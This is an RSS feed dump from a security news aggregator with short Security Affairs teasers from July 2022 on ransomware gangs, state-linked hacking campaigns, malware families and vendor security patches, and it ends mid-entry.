This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-13T05:07:09+00:00 www.secnews.physaphae.fr Security Affairs - Blog Secu Researchers uncovered an ongoing operation, codenamed DUCKTAIL that targets Facebook Business and Ad Accounts. Researchers from WithSecure (formerly F-Secure Business) have discovered an ongoing operation, named DUCKTAIL, that targets individuals and organizations that operate on Facebook's Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated threat actor which is suspected to […] ]]> 2022-07-27T14:51:28+00:00 https://securityaffairs.co/wordpress/133715/malware/ducktail-operation-facebook-business.html www.secnews.physaphae.fr/article.php?IdArticle=5970569 False Threat None None Security Affairs - Blog Secu Researchers found similarities between LockBit 3.0 ransomware and BlackMatter, which is a rebranded variant of the DarkSide ransomware. Cybersecurity researchers have found similarities between the latest version of the LockBit ransomware, LockBit 3.0, and the BlackMatter ransomware. The Lockbit 3.0 ransomware was released in June with important novelties such as a bug bounty program, Zcash payment, and new extortion […] ]]> 2022-07-27T11:25:33+00:00 https://securityaffairs.co/wordpress/133697/malware/lockbit-3-0-blackmatter-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5968116 False Ransomware None 3.0000000000000000 Security Affairs - Blog Secu The U.S. State Department increased rewards for information on any North Korea-linked threat actors to $10 million. In April 2020, the U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation released a joint advisory that is warning organizations worldwide about the 'significant cyber threat' posed by the North Korean nation-state actors […] ]]> 2022-07-26T18:57:31+00:00 https://securityaffairs.co/wordpress/133688/apt/us-north-korea-rewards.html www.secnews.physaphae.fr/article.php?IdArticle=5955290 False Threat None None Security Affairs - Blog Secu Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack method that takes advantage of how Microsoft Windows applications handle DLL […] ]]> 2022-07-26T16:14:12+00:00 https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html www.secnews.physaphae.fr/article.php?IdArticle=5953000 False Malware None None Security Affairs - Blog Secu Thera actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop. Threat actors are targeting websites using open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that can allow to execute arbitrary code and potentially steal customers’ payment information. PrestaShop is currently used by 300,000 shops worldwide […] ]]> 2022-07-26T06:22:58+00:00 https://securityaffairs.co/wordpress/133669/hacking/prestashop-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5946467 False Vulnerability,Threat None None Security Affairs - Blog Secu Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor.  Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […] ]]> 2022-07-25T23:10:18+00:00 https://securityaffairs.co/wordpress/133658/malware/cosmicstrand-uefi-firmware-rootkit.html www.secnews.physaphae.fr/article.php?IdArticle=5944102 False Malware,Threat None None Security Affairs - Blog Secu Multiple flaws in FileWave mobile device management (MDM) product exposed organizations to cyberattacks. Claroty researchers discovered two vulnerabilities in the FileWave MDM product that exposed more than one thousand organizations to cyber attacks. FIleWave MDM is used by organizations to view and manage device configurations, locations, security settings, and other device data. An organization may […] ]]> 2022-07-25T18:00:48+00:00 https://securityaffairs.co/wordpress/133649/hacking/filewave-mdm-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5941635 False None None None Security Affairs - Blog Secu The ransomware group Lockbit claims to have stolen 78 GB of files from the Italian Revenue Agency (Agenzia delle Entrate). The ransomware gang Lockbit claims to have hacked the Italian Revenue Agency (Agenzia delle Entrate) and added the government agency to the list of victims reported on its dark web leak site. “The Revenue Agency, operational since 1 January […] ]]> 2022-07-25T11:01:11+00:00 https://securityaffairs.co/wordpress/133640/cyber-crime/lockbit-ransomware-italian-revenue-agency.html www.secnews.physaphae.fr/article.php?IdArticle=5938781 False Ransomware None None Security Affairs - Blog Secu Operators behind the Amadey Bot malware use the SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows operators to install additional payloads. The malware is available for sale in illegal forums, in the past, it was used […] ]]> 2022-07-25T06:27:21+00:00 https://securityaffairs.co/wordpress/133617/cyber-crime/amadey-malware-spreads-smokeloader.html www.secnews.physaphae.fr/article.php?IdArticle=5936287 False Malware None None Security Affairs - Blog Secu Drupal development team released security updates to fix multiple issues, including a critical code execution flaw. Drupal developers have released security updates to address multiple vulnerabilities in the popular CMS: Drupal core – Moderately critical – Multiple vulnerabilities – SA-CORE-2022-015 Drupal core – Critical – Arbitrary PHP code execution – SA-CORE-2022-014 Drupal core – Moderately […] ]]> 2022-07-25T06:21:14+00:00 https://securityaffairs.co/wordpress/133625/security/drupal-flaws-2.html www.secnews.physaphae.fr/article.php?IdArticle=5936288 False None None None Security Affairs - Blog Secu North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries. Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in multiple countries, including Czech Republic, and Poland. The researchers attribute this campaign to the North Korea-linked APT37 group, aka […] ]]> 2022-07-24T13:53:53+00:00 https://securityaffairs.co/wordpress/133605/apt/apt37-stiffbizon-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=5923023 False Threat,Cloud APT 37,APT 28 None Security Affairs - Blog Secu Threat actor leaked data of 5.4 million Twitter users that were obtained by exploiting a now patched flaw in the popular platform. A threat actor has leaked data of 5.4 million Twitter accounts that were obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor is now offering for sale […] ]]> 2022-07-24T08:29:58+00:00 https://securityaffairs.co/wordpress/133593/data-breach/twitter-leaked-data.html www.secnews.physaphae.fr/article.php?IdArticle=5918894 False Vulnerability,Threat None None Security Affairs - Blog Secu The U.S. DoJ seized $500,000 worth of Bitcoin from North Korea-linked threat actors who are behind the Maui ransomware. The U.S. Department of Justice (DoJ) has seized $500,000 worth of Bitcoin from North Korean threat actors who used the Maui ransomware to target several organizations worldwide. “The Justice Department today announced a complaint filed in […] ]]> 2022-07-23T18:27:23+00:00 https://securityaffairs.co/wordpress/133587/cyber-warfare-2/fbi-seized-bitcoin-maui-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5906151 False Ransomware,Threat None None Security Affairs - Blog Secu Security company SonicWall released updates to address a critical SQL injection (SQLi) flaw in Analytics On-Prem and Global Management System (GMS) products. Security company SonicWall addressed a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […] ]]> 2022-07-23T05:00:47+00:00 https://securityaffairs.co/wordpress/133579/security/sonicwall-critical-sqli.html www.secnews.physaphae.fr/article.php?IdArticle=5892939 False None None None Security Affairs - Blog Secu Starting with Windows 11 Microsoft introduce by default an account lockout policy that can block brute force attacks. Starting with Windows 11 Insider Preview build 22528.1000 the OS supports an account lockout policy enabled by default to block brute force attacks. The lockout policy was set to limit the number of failed sign-in attempts to […] ]]> 2022-07-22T18:51:02+00:00 https://securityaffairs.co/wordpress/133568/security/windows-account-lockout-policy.html www.secnews.physaphae.fr/article.php?IdArticle=5882955 False None None None Security Affairs - Blog Secu 2022-07-22T11:27:57+00:00 https://securityaffairs.co/wordpress/133559/hacking/radio-hacked-fake-news-zelensky-health.html www.secnews.physaphae.fr/article.php?IdArticle=5876180 False Threat None None Security Affairs - Blog Secu The spyware developed by Israeli surveillance firm Candiru exploited recently fixed CVE-2022-2294 Chrome zero-day in attacks on journalists. Researchers from the antivirus firm Avast reported that the DevilsTongue spyware, developed, by Israeli surveillance firm Candiru, was used in attacks against journalists in the Middle East and exploited recently fixed CVE-2022-2294 Chrome zero-day. The flaw, which […] ]]> 2022-07-22T08:32:11+00:00 https://securityaffairs.co/wordpress/133546/intelligence/candiru-chrome-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5873279 False None None None Security Affairs - Blog Secu A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities. A threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi). The EvilNum is a […] ]]> 2022-07-22T05:45:39+00:00 https://securityaffairs.co/wordpress/133535/apt/ta4563-group-evilnum-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5870359 True Malware,Threat None None Security Affairs - Blog Secu Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware that was employed in an attack against a large Ukrainian software development company. The software development company produces software that is used by various state organizations in Ukraine. Researchers believe that […] ]]> 2022-07-21T20:20:16+00:00 https://securityaffairs.co/wordpress/133520/malware/attackers-target-software-firm-ukraine-gomet.html www.secnews.physaphae.fr/article.php?IdArticle=5861750 False Malware None None Security Affairs - Blog Secu Researchers discovered a previously undetected malware dubbed ‘Lightning Framework’ that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […] ]]> 2022-07-21T17:37:51+00:00 https://securityaffairs.co/wordpress/133506/malware/lightning-framework-linux-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5858907 False Malware None None Security Affairs - Blog Secu Atlassian released security updates to address a critical security vulnerability affecting Confluence Server and Confluence Data Center. Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed the Questions for Confluence […] ]]> 2022-07-21T13:49:01+00:00 https://securityaffairs.co/wordpress/133496/hacking/atlassian-confluence-server-data-center-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5855185 False Vulnerability None None Security Affairs - Blog Secu Apple released security updates to address multiple vulnerabilities that affect iOS, iPadOS, macOS, tvOS, and watchOS devices. Apple released security updates to fix 37 vulnerabilities impacting iOS, iPadOS, macOS, tvOS, and watchOS devices. The flaws addressed by Apple lead to arbitrary code execution, privilege escalation, denial-of-service (DoS), and information disclosure. Below is the list of Apple […] ]]> 2022-07-21T09:22:03+00:00 https://securityaffairs.co/wordpress/133486/security/apple-security-updates.html www.secnews.physaphae.fr/article.php?IdArticle=5851466 False Guideline None None Security Affairs - Blog Secu The crimeware group known as 8220 Gang expanded over the last month their Cloud Botnet to roughly 30,000 hosts globally.  Researchers from SentinelOne reported that low-skill crimeware 8220 Gang has expanded their Cloud Botnet over the last month to roughly 30,000 hosts globally.  The gang focuses on infecting cloud hosts to deploy cryptocurrency miners by […] ]]> 2022-07-21T08:06:47+00:00 https://securityaffairs.co/wordpress/133462/cyber-crime/8220-gang-cloud-botnet-spike.html www.secnews.physaphae.fr/article.php?IdArticle=5850536 False None None None Security Affairs - Blog Secu Kaspersky researchers discovered a new ransomware family written in Rust, named Luna, that targets Windows, Linux, and ESXi systems. Researchers from Kaspersky Lab detailed a new ransomware family named Luna, which is written in Rust and is able to target Windows, Linux, and ESXi systems. Luna ransomware is the third ransomware family that is written […] ]]> 2022-07-20T20:16:43+00:00 https://securityaffairs.co/wordpress/133454/cyber-crime/luna-ransomware-rust.html www.secnews.physaphae.fr/article.php?IdArticle=5838890 False Ransomware None None Security Affairs - Blog Secu Multiple flaws in MiCODUS MV720 Global Positioning System (GPS) trackers shipped with over 1.5 million vehicles can allow hackers to remotely hack them. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an advisory to warn of multiple security vulnerabilities in MiCODUS MV720 Global Positioning System (GPS) trackers which are used by over 1.5 million vehicles. An attacker […] ]]> 2022-07-20T14:53:48+00:00 https://securityaffairs.co/wordpress/133445/hacking/micodus-tracker-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5833244 False Hack None None Security Affairs - Blog Secu The Council of the European Union (EU) warns of malicious cyber activities conducted by threat actors in the context of the ongoing conflict between Russia and Ukraine. The Council of the European Union (EU) warns of the risks associated with the malicious cyber activities conducted by threat actors in the context of the ongoing conflict […] ]]> 2022-07-20T05:51:49+00:00 https://securityaffairs.co/wordpress/133436/cyber-warfare-2/eu-warns-ukraine-spillover.html www.secnews.physaphae.fr/article.php?IdArticle=5827810 False Threat None None Security Affairs - Blog Secu The Minister for Foreign Affairs of Belgium blames multiple China-linked threat actors for attacks against The country’s defense and interior ministries. The Minister for Foreign Affairs of Belgium revealed that multiple China-linked APT groups targeted the country’s defense and interior ministries. “Belgium exposes malicious cyber activities that significantly affected our sovereignty, democracy, security and society at large by targeting the […] ]]> 2022-07-20T05:39:58+00:00 https://securityaffairs.co/wordpress/133425/apt/belgium-claims-china-hit-its-ministries.html www.secnews.physaphae.fr/article.php?IdArticle=5827811 False Threat None None Security Affairs - Blog Secu Researchers spotted previously undocumented spyware, dubbed CloudMensis, that targets the Apple macOS systems. Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2. The malware was designed to spy on the target systems, exfiltrate documents, acquire keystrokes, and screen captures. […] ]]> 2022-07-19T20:07:23+00:00 https://securityaffairs.co/wordpress/133416/hacking/cloudmensis-spyware.html www.secnews.physaphae.fr/article.php?IdArticle=5827812 False Malware None None Security Affairs - Blog Secu Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […] ]]> 2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html www.secnews.physaphae.fr/article.php?IdArticle=5825713 False Threat APT 29 None Security Affairs - Blog Secu The U.S. FBI has warned of crooks developing malicious cryptocurrency-themed apps to steal crypto assets from the users. The U.S. Federal Bureau of Investigation (FBI) has warned of crooks creating malicious cryptocurrency-themed apps to steal crypto assets from investors. Crooks contact US investors claiming to offer legitimate cryptocurrency investment services, and attempt to trick them […] ]]> 2022-07-19T10:25:34+00:00 https://securityaffairs.co/wordpress/133402/cyber-crime/fbi-rogue-cryptocurrency-themed-apps.html www.secnews.physaphae.fr/article.php?IdArticle=5824232 False None None None Security Affairs - Blog Secu Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer, and Coper malware families. Researchers from security firms Pradeo discovered multiple apps spreading the Joker Android malware. The […] ]]> 2022-07-19T08:44:47+00:00 https://securityaffairs.co/wordpress/133394/malware/play-store-apps-joker-facestealer-coper.html www.secnews.physaphae.fr/article.php?IdArticle=5823539 False Malware None None Security Affairs - Blog Secu Cybercriminals released a new MLNK Builder 4.2 tool for malicious shortcuts (LNK) generation with an improved Powershell and VBS Obfuscator Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, has detected an update of one of the most popular tools used by cybercriminals to generate malicious LNK files, so frequently used for […] ]]> 2022-07-18T19:49:05+00:00 https://securityaffairs.co/wordpress/133381/cyber-crime/mlnk-builder-4-2-released-dark-web.html www.secnews.physaphae.fr/article.php?IdArticle=5819361 False Tool None None Security Affairs - Blog Secu The Tor Project team has announced the release of Tor Browser 11.5, which introduces functionalities to automatically bypass censorship. The Tor Project team has announced the release of Tor Browser 11.5, the new version of the popular privacy-oriented browser implements new features to fight censorship. With previous versions of the browser, circumventing censorship of the […] ]]> 2022-07-18T14:58:33+00:00 https://securityaffairs.co/wordpress/133371/digital-id/tor-browser-bypass-censorship.html www.secnews.physaphae.fr/article.php?IdArticle=5817059 False None None None Security Affairs - Blog Secu A synchronized criminal attack from abroad hit Albania over the weekend, all Albanian government systems shut down following the cyberattack. Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A synchronized criminal attack from abroad hit the servers of the National Agency for Information Society (AKSHI), which handles many […] ]]> 2022-07-18T11:44:08+00:00 https://securityaffairs.co/wordpress/133363/cyber-warfare-2/albania-cyber-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5816420 False None None None Security Affairs - Blog Secu Researchers published an analysis of the Windows remote code execution vulnerability CVE-2022-30136 impacting the Network File System. Trend Micro Research has published an analysis of the recently patched Windows vulnerability CVE-2022-30136 that impacts the Network File System. CVE-2022-30136 is a remote code execution vulnerability that resides in the Windows Network File System, it is due […] ]]> 2022-07-18T10:43:56+00:00 https://securityaffairs.co/wordpress/133355/security/cve-2022-30136-windows-nfs-rce.html www.secnews.physaphae.fr/article.php?IdArticle=5815566 False Vulnerability None None Security Affairs - Blog Secu The high-end British jeweler Graff paid a £6 million ransom after the ransomware attack it suffered in 2021. In September 2021, the Conti ransomware gang hit high society jeweler Graff and threatens to release private details of world leaders, actors and tycoons The customers of the company are the richest people on the globe, including […] ]]> 2022-07-18T07:23:20+00:00 https://securityaffairs.co/wordpress/133347/cyber-crime/graff-paid-a-7-5m-ransom.html www.secnews.physaphae.fr/article.php?IdArticle=5814425 False Ransomware,Guideline None None Security Affairs - Blog Secu Threat actors hacked the popular NFT platform, Premint NFT and stole 314 NFTs. The popular NFT platform, Premint NFT, was hacked, the threat actors compromised its official website and stole 314 NFTs. According to the experts from blockchain security firm CertiK, this is one of the biggest NFT hacks on record. The analysis of the […] ]]> 2022-07-17T19:24:43+00:00 https://securityaffairs.co/wordpress/133339/cyber-crime/crooks-stole-375k-from-premint-nft-it-is-one-of-the-biggest-nft-hacks-ever.html www.secnews.physaphae.fr/article.php?IdArticle=5803062 False Threat None None Security Affairs - Blog Secu Google is going to remove the app permissions list from the official Play Store for both the mobile app and the web. As part of the “Data safety” initiative for the Android app on the Play Store, Google plans to remove the app permissions list from both the mobile app and the web. In April, […] ]]> 2022-07-17T17:56:22+00:00 https://securityaffairs.co/wordpress/133334/mobile-2/google-removes-app-permissions-list-play-store.html www.secnews.physaphae.fr/article.php?IdArticle=5801045 False None None None Security Affairs - Blog Secu Researchers from Proofpoint warn that various APT groups are targeting journalists and media organizations since 2021. Proofpoint researchers warn that APT groups are regularly targeting and posing as journalists and media organizations since early 2021. The media sector is a privileged target for this category of attackers due to the access its operators have to […] ]]> 2022-07-17T04:44:08+00:00 https://securityaffairs.co/wordpress/133317/apt/apt-groups-targer-journalists.html www.secnews.physaphae.fr/article.php?IdArticle=5788067 False None None None Security Affairs - Blog Secu A vulnerability in the Netwrix Auditor software can be exploited to execute arbitrary code on affected devices. Bishop Fox discovered a vulnerability in the Netwrix Auditor software that can be exploited by attackers to execute arbitrary code on affected devices. Netwrix Auditor is a an auditing software that allows organizations to monitor their IT infrastructure, […] ]]> 2022-07-16T19:49:50+00:00 https://securityaffairs.co/wordpress/133310/hacking/netwrix-auditor-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5778726 False Vulnerability None None Security Affairs - Blog Secu CISA urges admins to apply recently released fixes in Juniper Networks products, including Junos Space, Contrail Networking and NorthStar Controller. CISA urges users and administrators to review the Juniper Networks security advisories page and apply security updates available for some products, including Junos Space, Contrail Networking and NorthStar Controller. Threat actors can exploit some of these vulnerabilities […] ]]> 2022-07-16T14:16:22+00:00 https://securityaffairs.co/wordpress/133301/security/juniper-networks-critical-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5773531 False Threat None None Security Affairs - Blog Secu Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign targeting the Elastix system used in Digium phones since December 2021. Threat actors exploited a vulnerability, tracked as CVE-2021-45461 (CVSS score 9.8), in the Rest Phone Apps (restapps) module to implant […] ]]> 2022-07-16T13:14:26+00:00 https://securityaffairs.co/wordpress/133293/hacking/digium-phones-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5772481 False Vulnerability,Threat None None Security Affairs - Blog Secu Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controller (PLC), Human-Machine […] ]]> 2022-07-15T22:27:19+00:00 https://securityaffairs.co/wordpress/133281/malware/sality-malware-industrial-systems.html www.secnews.physaphae.fr/article.php?IdArticle=5756154 False Vulnerability,Threat None None Security Affairs - Blog Secu Researchers spotted a massive campaign that scanned close to 1.6 million WordPress sites for vulnerable Kaswara Modern WPBakery Page Builder Addons. The Wordfence Threat Intelligence team observed a sudden increase in attacks targeting the Kaswara Modern WPBakery Page Builder Addons. Threat actors are attempting to exploit an arbitrary file upload vulnerability tracked as CVE-2021-24284. The […] ]]> 2022-07-15T14:33:04+00:00 https://securityaffairs.co/wordpress/133267/hacking/wpbakery-page-builder-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5747300 False Vulnerability,Threat None None Security Affairs - Blog Secu Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North Korea-linked group they tracked as DEV-0530. The Holy Ghost ransomware gang has been active since June 2021 and it conducted ransomware […] ]]> 2022-07-15T12:08:14+00:00 https://securityaffairs.co/wordpress/133255/hacking/holy-ghost-ransomware-north-korea.html www.secnews.physaphae.fr/article.php?IdArticle=5745126 False Ransomware,Threat None None Security Affairs - Blog Secu Cyble researchers warn of three new ransomware operations named Lilith, RedAlert and 0mega targeting organizations worldwide. Researchers from threat intelligence firm Cyble warn of new ransomware gangs that surfaced recently, named Lilith, RedAlert, and 0mega. RedAlert (aka N13V) targets both Windows and Linux VMWare ESXi servers of target organizations. The name RedAlert comes after a string […] ]]> 2022-07-15T07:26:04+00:00 https://securityaffairs.co/wordpress/133248/cyber-crime/lilith-redalert-0mega-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5739657 False Ransomware,Threat None None Security Affairs - Blog Secu The largest HTTPS DDoS attack recently mitigated by Cloudflare was launched by the Mantis botnet. In June 2022, DDoS mitigation firm Cloudflare announced it has mitigated the largest HTTPS DDoS attack that was launched by a botnet they have called Mantis. The Mantis botnet generated 26 million request per second using approximately 5000 hijacked virtual […] ]]> 2022-07-14T18:32:55+00:00 https://securityaffairs.co/wordpress/133233/hacking/mantis-botnet-record-ddos-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5725520 False None None None Security Affairs - Blog Secu Researchers warn of a new vulnerability, dubbed Retbleed, that impacts multiple older AMD and Intel microprocessors. ETH Zurich researchers Johannes Wikner and Kaveh Razavi discovered a new vulnerability, dubbed Retbleed, that affects multiple older AMD and Intel microprocessors. An attacker can exploit the flaw to bypass current defenses and perform in Spectre-based attacks. The Retbleed vulnerability is tracked as […] ]]> 2022-07-14T16:38:02+00:00 https://securityaffairs.co/wordpress/133222/security/retbleed-speculative-execution-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5723409 False None None None Security Affairs - Blog Secu Former CIA programmer, Joshua Schulte, was convicted in a US federal court of the 2017 leak of a massive leak to WikiLeaks. The former CIA programmer Joshua Schulte (33) was found guilty in New York federal court of stealing the agency's hacking tools and leaking them to WikiLeaks in 2017. The huge trove of data, […] ]]> 2022-07-14T10:17:48+00:00 https://securityaffairs.co/wordpress/133225/intelligence/former-cia-joshua-schulte-convicted.html www.secnews.physaphae.fr/article.php?IdArticle=5717251 False None None None Security Affairs - Blog Secu Microsoft published the exploit code for a vulnerability in macOS that can allow an attacker to escape the sandbox. Microsoft publicly disclosed technical details for an access issue vulnerability, tracked as CVE-2022-26706, that resides in the macOS App Sandbox. “Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted […] ]]> 2022-07-14T09:24:51+00:00 https://securityaffairs.co/wordpress/133211/hacking/macos-sandbox-bypass-exploit.html www.secnews.physaphae.fr/article.php?IdArticle=5717252 False Vulnerability None None Security Affairs - Blog Secu VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048, in vCenter Server IWA mechanism. VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048 (CVSSv3 base score of 7.1.), in vCenter Server ‘s IWA (Integrated Windows Authentication) mechanism after eight months since its disclosure. The vulnerability can be exploited by an attacker with non-administrative […] ]]> 2022-07-14T07:42:48+00:00 https://securityaffairs.co/wordpress/133204/security/vmware-vcenter-server-flaw-2.html www.secnews.physaphae.fr/article.php?IdArticle=5714170 False Vulnerability None None Security Affairs - Blog Secu Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns, it inserts replies in active email threads. The threat continues to […] ]]> 2022-07-13T18:29:04+00:00 https://securityaffairs.co/wordpress/133191/malware/qakbot-continues-to-evolve.html www.secnews.physaphae.fr/article.php?IdArticle=5700264 False Malware,Threat None None Security Affairs - Blog Secu IT giant Lenovo released security fixes to address three vulnerabilities that impact the UEFI firmware shipped with over 70 product models. The multinational technology company Lenovo released security fixes to address three vulnerabilities that reside in the UEFI firmware shipped with over 70 product models, including several ThinkBook models. A remote attacker can trigger these […] ]]> 2022-07-13T14:46:34+00:00 https://securityaffairs.co/wordpress/133186/security/lenovo-uefi-firmware-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5696205 False None None None Security Affairs - Blog Secu A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user's sign-in session, and bypass the authentication process even when the victim has enabled the MFA. In AiTM phishing, threat actors set up a proxy […] ]]> 2022-07-13T05:56:54+00:00 https://securityaffairs.co/wordpress/133154/hacking/aitm-phishing-campaigns.html www.secnews.physaphae.fr/article.php?IdArticle=5684511 False Threat None None Security Affairs - Blog Secu Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt. The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt. The European Central Bank revealed that the hacking attempt took place recently, but the good news it that its experts […] ]]> 2022-07-12T22:07:16+00:00 https://securityaffairs.co/wordpress/133163/hacking/european-central-bank-hacking-attempt.html www.secnews.physaphae.fr/article.php?IdArticle=5677421 False None None None Security Affairs - Blog Secu The protocol for radio-controlled (RC) drones, named ExpressLRS, is affected by vulnerabilities that can allow device takeover. Researchers warn of vulnerabilities that affect the protocol for radio-controlled (RC) drones, named ExpressLRS, which can be exploited to take over unmanned vehicles. ExpressLRS is a high-performance open-source radio control link that provides a low latency radio control […] ]]> 2022-07-12T15:25:06+00:00 https://securityaffairs.co/wordpress/133146/hacking/expresslrs-protocol-flaws-drones-takeover.html www.secnews.physaphae.fr/article.php?IdArticle=5671249 False None None None Security Affairs - Blog Secu Microsoft announced the general availability of a feature called Autopatch that automatically updates Windows and Office software. Microsoft announced the general availability of a service called Autopatch that automates the process of managing and rolling out updates to Windows and Office software. The feature is available for Windows Enterprise E3 and E5 licenses, but Windows Education (A3) or Windows […] ]]> 2022-07-12T09:21:37+00:00 https://securityaffairs.co/wordpress/133139/security/microsoft-autopatch.html www.secnews.physaphae.fr/article.php?IdArticle=5667733 False None None None Security Affairs - Blog Secu Researchers investigated cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs. Researchers from Trend Micro published a report that details cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs and the threat actors behind them. Threat actors are attempting to compromise a large number of cloud-based systems to mine cryptocurrency with a significant […] ]]> 2022-07-12T07:26:21+00:00 https://securityaffairs.co/wordpress/133125/malware/cryptocurrency-mining-cloud-infrastructure.html www.secnews.physaphae.fr/article.php?IdArticle=5667156 False Threat None None Security Affairs - Blog Secu Threat actors used a fake job offer on LinkedIn to target an employee at Axie Infinity that resulted in the theft of $540 Million. In March, threat actors stole almost $625 million in Ethereum and USDC (a U.S. dollar pegged stablecoin) tokens from Axie Infinity's Ronin network bridge. The attack took place on March 23rd, but […] ]]> 2022-07-11T14:42:18+00:00 https://securityaffairs.co/wordpress/133113/cyber-crime/axie-infinity-hack-fake-job-offer.html www.secnews.physaphae.fr/article.php?IdArticle=5661536 False Threat None None Security Affairs - Blog Secu A large-scale phishing campaign leveraging the Anubis Network is targeting Brazil and Portugal since March 2022. A large-scale phishing campaign is targeting Internet-end users in Brazil and Portugal since March 2022. Anubis Network is a C2 portal developed to control fake portals and aims to steal credentials to fully access the real systems. This C2 […] ]]> 2022-07-11T10:42:22+00:00 https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html www.secnews.physaphae.fr/article.php?IdArticle=5659665 False None None None Security Affairs - Blog Secu BlackCat (aka ALPHV) Ransomware gang introduced an advanced search by stolen victim's passwords, and confidential documents. The notorious cybercriminal syndicate BlackCat competes with Conti and Lockbit 3.0. They introduced an advanced search by stolen victim's passwords, and confidential documents leaked in the TOR network Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, […] ]]> 2022-07-11T09:27:27+00:00 https://securityaffairs.co/wordpress/133107/cyber-crime/blackcat-alphv-ransomware-demands.html www.secnews.physaphae.fr/article.php?IdArticle=5659347 False Ransomware None None Security Affairs - Blog Secu BleepingComputer reported a new ransomware operation named 0mega that is targeting organizations worldwide. 0mega is a new 